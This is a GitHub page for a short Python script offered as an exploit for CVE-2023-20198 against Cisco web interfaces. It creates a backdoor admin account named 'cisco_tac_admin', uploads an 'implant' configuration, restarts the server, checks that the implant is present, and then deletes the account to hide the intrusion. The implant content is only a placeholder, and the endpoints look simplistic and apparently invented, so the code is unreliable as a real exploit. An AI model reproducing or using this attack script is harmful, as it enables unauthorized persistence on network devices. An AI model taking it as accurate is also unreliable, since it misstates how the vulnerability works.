-
Notifications
You must be signed in to change notification settings - Fork 6
/
CVE-2023-20198.py
56 lines (39 loc) · 1.6 KB
/
CVE-2023-20198.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
# Exploit CVE-2023-20198 to create a local user account
create_user_url = "https://target.com/webui/create_user"
username = "cisco_tac_admin"
password = "P@ssw0rd"
user_payload = {
"username": username,
"password": password
}
response = requests.post(create_user_url, data=user_payload, verify=False)
if response.status_code == 200:
print(f"Successfully created local user account: {username}")
# Exploit CVE-2021-1435 to install the implant
install_url = f"https://target.com/webui/cisco_service.conf"
config_content = "<insert implant configuration content here>"
config_payload = {
"config_content": config_content
}
response = requests.post(install_url, data=config_payload, verify=False)
if response.status_code == 200:
print("Implant installed successfully")
# Restart the web server to activate the implant
restart_url = "https://target.com/webui/restart_server"
response = requests.post(restart_url, verify=False)
if response.status_code == 200:
print("Web server restarted successfully. Implant is active")
# Check for the presence of the implant
check_url = f"https://target.com/webui/implant_status"
response = requests.get(check_url, verify=False)
if response.status_code == 200:
if "implant" in response.text:
print("Implant is present")
else:
print("Implant is not present")
# Clean up by deleting the local user account
delete_user_url = f"https://target.com/webui/delete_user/{username}"
response = requests.delete(delete_user_url, verify=False)
if response.status_code == 200:
print(f"Successfully deleted local user account: {username}")